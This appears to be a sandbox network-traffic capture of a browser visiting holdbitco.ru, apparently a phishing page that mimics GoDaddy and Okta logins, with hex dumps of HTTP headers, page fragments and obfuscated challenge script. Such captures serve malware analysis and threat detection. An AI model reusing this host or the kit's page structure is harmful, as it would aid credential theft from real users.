                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC608INData Raw: 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 27 2b 20 77 65 62 6e 61 6d 65 20 2b 27 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 72 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 27 2b 20 77 65 62 6e 61 6d 65 20 2b 27 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 72 65 67 75 6c 61 72 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: f" crossorigin="anonymous"> <link rel="preload" href="'+ webname +'/assets/fonts/GDSherpa-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous"> <link rel="preload" href="'+ webname +'/assets/fonts/GDSherpa-regular.woff" as="font" type="font/
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC609INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              49104.21.0.95443192.168.2.1649791C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:39 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                                                                              cache-control: max-age=14400, public
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RN0TG9AhZ2Ksv0CqWHJ5oRnMB9InTaM0%2B7C8J7apH9NjH%2Ft%2BpvmTjsYLFc5tv8sJK0bw5z4uUROZghmbbQL7CtR4%2BAlKV5NcCos2cgVO2cJDrwiYBIdu%2Bg65rVrLA5ksC7kSYVnJeEy1v38P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4017976389d-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC610INData Raw: 31 63 61 36 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 52 2c 67 2c 68 2c 69 2c 6e 2c 6f 29 7b 52 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 51 2c 66 2c 79 29 7b 66 6f 72 28 51 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 79 3d 70 61 72 73 65 49 6e 74 28 51 28 35 30 32 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 51 28 34 38 33 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 51 28 34 36 35 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 35 34 33 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 51 28 34 35 32 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 35 32 33 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 51 28 35 31 35 29 29 2f 37 2b 2d 70
                                                                                                                                                                                                                                                                                                              Data Ascii: 1ca6window._cf_chl_opt={cFPWv:'g'};~function(R,g,h,i,n,o){R=b,function(c,e,Q,f,y){for(Q=b,f=c();!![];)try{if(y=parseInt(Q(502))/1*(parseInt(Q(483))/2)+parseInt(Q(465))/3+-parseInt(Q(543))/4*(-parseInt(Q(452))/5)+-parseInt(Q(523))/6+parseInt(Q(515))/7+-p
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC611INData Raw: 2c 49 2b 2b 29 2c 44 5b 4f 5d 3d 48 2b 2b 2c 53 74 72 69 6e 67 28 4e 29 29 7d 69 66 28 46 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 55 28 34 38 35 29 5d 5b 55 28 35 34 31 29 5d 5b 55 28 34 34 39 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 55 28 34 36 39 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 41 2d 31 3f 28 4c 3d 30 2c 4a 5b 55 28 35 31 30 29 5d 28 42 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 55 28 34 36 39 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 50 26 31 2e 36 39 7c 4b 3c 3c 31 2e 33 34 2c 41 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 55 28 35 31 30 29 5d 28 42 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65
                                                                                                                                                                                                                                                                                                              Data Ascii: ,I++),D[O]=H++,String(N))}if(F!==''){if(Object[U(485)][U(541)][U(449)](E,F)){if(256>F[U(469)](0)){for(C=0;C<I;K<<=1,L==A-1?(L=0,J[U(510)](B(K)),K=0):L++,C++);for(P=F[U(469)](0),C=0;8>C;K=P&1.69|K<<1.34,A-1==L?(L=0,J[U(510)](B(K)),K=0):L++,P>>=1,C++);}else
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC612INData Raw: 4e 21 3d 49 3b 4f 3d 4b 26 4a 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 41 2c 4a 3d 42 28 4c 2b 2b 29 29 2c 4d 7c 3d 49 2a 28 30 3c 4f 3f 31 3a 30 29 2c 49 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 50 3d 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 58 28 35 33 30 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 4e 21 3d 49 3b 4f 3d 4b 26 4a 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 41 2c 4a 3d 42 28 4c 2b 2b 29 29 2c 4d 7c 3d 28 30 3c 4f 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29 2c 50 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 58 28 35 33 30 29 5d 28 32 2c 31 36 29 2c 49 3d 31 3b 49 21 3d 4e 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31
                                                                                                                                                                                                                                                                                                              Data Ascii: N!=I;O=K&J,K>>=1,K==0&&(K=A,J=B(L++)),M|=I*(0<O?1:0),I<<=1);switch(P=M){case 0:for(M=0,N=Math[X(530)](2,8),I=1;N!=I;O=K&J,K>>=1,K==0&&(K=A,J=B(L++)),M|=(0<O?1:0)*I,I<<=1);C[E++]=e(M),P=E-1,D--;break;case 1:for(M=0,N=Math[X(530)](2,16),I=1;I!=N;O=J&K,K>>=1
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC614INData Raw: 39 2c 21 65 29 26 26 28 65 3d 21 21 5b 5d 2c 7a 3d 77 28 29 2c 6c 28 63 2e 72 2c 7a 2e 72 29 2c 7a 2e 65 26 26 6d 28 61 61 28 35 33 36 29 2c 7a 2e 65 29 29 7d 2c 68 5b 61 39 28 34 37 37 29 5d 21 3d 3d 61 39 28 34 34 34 29 29 3f 66 28 29 3a 67 5b 61 39 28 35 32 32 29 5d 3f 68 5b 61 39 28 35 32 32 29 5d 28 61 39 28 34 37 36 29 2c 66 29 3a 28 79 3d 68 5b 61 39 28 35 31 37 29 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 68 5b 61 39 28 35 31 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 62 29 7b 61 62 3d 61 39 2c 79 28 29 2c 68 5b 61 62 28 34 37 37 29 5d 21 3d 3d 61 62 28 34 34 34 29 26 26 28 68 5b 61 62 28 35 31 37 29 5d 3d 79 2c 66 28 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 63 2c 61 34 2c 65 29 7b 66 6f 72 28 61 34 3d 52 2c 65 3d 5b 5d 3b 63 21 3d 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: 9,!e)&&(e=!![],z=w(),l(c.r,z.r),z.e&&m(aa(536),z.e))},h[a9(477)]!==a9(444))?f():g[a9(522)]?h[a9(522)](a9(476),f):(y=h[a9(517)]||function(){},h[a9(517)]=function(ab){ab=a9,y(),h[ab(477)]!==ab(444)&&(h[ab(517)]=y,f())})}function v(c,a4,e){for(a4=R,e=[];c!==
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC615INData Raw: 78 27 7d 63 61 74 63 68 28 43 29 7b 72 65 74 75 72 6e 27 69 27 7d 72 65 74 75 72 6e 20 66 5b 61 33 28 34 38 36 29 5d 5b 61 33 28 34 39 31 29 5d 28 79 5b 7a 5d 29 3f 27 61 27 3a 79 5b 7a 5d 3d 3d 3d 66 5b 61 33 28 34 38 36 29 5d 3f 27 43 27 3a 28 41 3d 74 79 70 65 6f 66 20 79 5b 7a 5d 2c 61 33 28 35 33 35 29 3d 3d 41 3f 73 28 66 2c 79 5b 7a 5d 29 3f 27 4e 27 3a 27 66 27 3a 6f 5b 41 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 63 29 7b 72 65 74 75 72 6e 20 61 63 3d 27 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 3b 7a 54 66 43 4c 64 67 50 77 62 6f 3b 70 6f 77 3b 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 3b 72 65 70 6c 61 63 65 3b 69 6e 63 6c 75 64 65 73 3b 6c 65 6e 67 74 68 3b 66 75 6e 63 74 69 6f 6e 3b 65 72 72 6f 72 20 6f 6e 20 63 66 5f 63 68
                                                                                                                                                                                                                                                                                                              Data Ascii: x'}catch(C){return'i'}return f[a3(486)][a3(491)](y[z])?'a':y[z]===f[a3(486)]?'C':(A=typeof y[z],a3(535)==A?s(f,y[z])?'N':'f':o[A]||'?')}function a(ac){return ac='[native code];zTfCLdgPwbo;pow;contentDocument;replace;includes;length;function;error on cf_ch
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC616INData Raw: 65 6e 74 3b 6b 65 79 73 27 2e 73 70 6c 69 74 28 27 3b 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 63 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 2c 64 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 61 28 29 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 3d 66 2d 34 34 34 2c 68 3d 65 5b 66 5d 2c 68 7d 2c 62 28 63 2c 64 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 5a 2c 63 2c 65 2c 66 2c 79 29 7b 69 66 28 28 5a 3d 52 2c 63 3d 67 5b 5a 28 34 35 31 29 5d 2c 65 3d 33 36 30 30 2c 63 2e 74 29 26 26 28 66 3d 4d 61 74 68 5b 5a 28 34 38 30 29 5d 28 2b 61 74 6f 62 28 63 2e 74 29 29 2c 79 3d 4d 61 74 68 5b 5a 28 34 38 30 29 5d 28 44 61 74 65 5b 5a 28 35 34 32 29 5d 28 29 2f 31 65 33 29 2c 79 2d 66 3e 65 29 29
                                                                                                                                                                                                                                                                                                              Data Ascii: ent;keys'.split(';'),a=function(){return ac},a()}function b(c,d,e){return e=a(),b=function(f,g,h){return f=f-444,h=e[f],h},b(c,d)}function k(Z,c,e,f,y){if((Z=R,c=g[Z(451)],e=3600,c.t)&&(f=Math[Z(480)](+atob(c.t)),y=Math[Z(480)](Date[Z(542)]()/1e3),y-f>e))
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC617INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              5192.168.2.1649734104.17.25.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC5OUTGET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              50192.168.2.1649792104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC617OUTGET /web5/assets/pages/1rd551.css?cb=1698251258165 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              51192.168.2.1649796104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC617OUTGET /web5/assets/css/pages.min.css?cb=1698251258165 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              52192.168.2.1649795104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC618OUTGET /web5/assets/css/pages-godaddy.css?cb=1698251258165 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              53192.168.2.1649794104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC618OUTGET /web5/assets/css/pages-okta.css?cb=1698251258165 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              54192.168.2.1649793104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC619OUTGET /web5/assets/fonts/GDSherpa-bold.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              55192.168.2.16497973.162.103.20443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC620OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: cdn.socket.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              56192.168.2.1649798104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC620OUTGET /web5/assets/fonts/GDSherpa-bold.woff HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              573.162.103.20443192.168.2.1649797C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              Content-Length: 45806
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                                                                                                                                                                                                                              Date: Mon, 16 Oct 2023 10:30:13 GMT
                                                                                                                                                                                                                                                                                                              ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: iad1::c44m8-1697452213626-8eaa4d049585
                                                                                                                                                                                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                              Via: 1.1 e21deb2f30f16d84eb8e8fda826091d4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: IAD61-P1
                                                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: hYA_SjV2ae84pz1uQYnvlDZDZixRmXW8fyFV0nOpt97aeia4YLFK-Q==
                                                                                                                                                                                                                                                                                                              Age: 6917230
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC622INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
